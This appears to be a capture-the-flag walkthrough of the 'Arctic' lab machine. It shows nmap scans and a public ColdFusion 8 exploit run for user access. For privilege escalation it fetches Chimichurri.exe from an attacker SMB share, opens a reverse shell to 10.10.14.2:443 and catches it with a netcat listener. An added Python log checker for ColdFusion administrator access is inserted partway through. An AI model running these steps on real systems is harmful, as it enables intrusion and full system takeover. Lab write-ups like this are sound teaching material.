
Ping

ping 10.10.10.11

Nmap Default Scan

nmap 10.10.10.11 -oN dnmap

Nmap Service and Script Scan

nmap 10.10.10.11 -sC -sV -A -oN snmap

Nmap All Ports Scan

nmap -p- --min-rate 10000 10.10.10.11 -oN anmap

FMTP Enumeration on Port 8500

Moving into /CFIDE

/Administrator looks interesting

Can see the ColdFusion version 8
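From the defender's side, the /CFIDE/administrator page reached above should only ever be requested from a management network. The check below is an added example, not part of the original walkthrough: it scans web access logs for requests to that path from other sources. The Common Log Format, the sample lines and the allowed subnet 192.168.1.0/24 are assumptions constructed for illustration.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample lines in Common Log Format (assumed, not from the page).
SAMPLE_LOG = """\
10.10.14.2 - - [01/Jan/2024:10:00:01 +0000] "GET /CFIDE/ HTTP/1.1" 200 1024
10.10.14.2 - - [01/Jan/2024:10:00:09 +0000] "GET /CFIDE/administrator/ HTTP/1.1" 200 9312
10.10.14.2 - - [01/Jan/2024:10:00:15 +0000] "GET /cfide/Administrator/index.cfm HTTP/1.1" 200 9312
192.168.1.5 - - [01/Jan/2024:10:01:00 +0000] "GET /CFIDE/administrator/ HTTP/1.1" 200 9312
10.10.14.7 - - [01/Jan/2024:10:02:00 +0000] "GET /index.cfm HTTP/1.1" 200 512
garbage line that does not parse
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')
ADMIN_PREFIX = "/cfide/administrator"
# Hypothetical management subnet that is allowed to reach the administrator.
ADMIN_ALLOWED = [ipaddress.ip_network("192.168.1.0/24")]


def is_allowed(ip):
    """True when the client address is inside an allowed management network."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in ADMIN_ALLOWED)


def find_admin_exposure(log_text):
    """Return {client_ip: [(timestamp, path, status), ...]} for administrator
    requests that came from outside the allowed networks."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, ts, _method, path, status = m.groups()
        # Windows paths are case-insensitive: decode, drop the query, lowercase.
        normalized = unquote(path).split("?", 1)[0].lower()
        if not normalized.startswith(ADMIN_PREFIX):
            continue
        try:
            if is_allowed(ip):
                continue
        except ValueError:
            continue  # client field is a hostname, not an IP address
        hits[ip].append((ts, path, int(status)))
    return dict(hits)


if __name__ == "__main__":
    for ip, reqs in find_admin_exposure(SAMPLE_LOG).items():
        print(ip, len(reqs), "administrator requests")
```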

Will search the internet for any public exploits for the ColdFusion version found.

Found one on Exploit-DB: https://www.exploit-db.com/exploits/50057

I have saved the Python exploit code on my machine in a file named exp.py

Have to change a small part of the code: set the lhost, lport, rhost and rport accordingly.

Run the Script

python3 exp.py

Got it…!

Got user.txt

Will jump to Privilege Escalation…!

Will get the system info.

Got the vulnerable build, and we know the method to elevate our privilege.

As we have already done this type of PE on the box DEVEL, going to use the same exploit, Chimichurri.exe: https://github.com/egre55/windows-kernel-exploits/blob/master/MS10-059:%20Chimichurri/Compiled/Chimichurri.exe

Started an SMB share

And copied the binary from our Kali machine

copy \\10.10.14.2\kali\Chimichurri.exe

Ran the binary according to the usage

Chimichurri.exe 10.10.14.2 443

Got a reverse shell as NT AUTHORITY

rlwrap nc -nvlp 443

Got root.txt

Done with Arctic…:)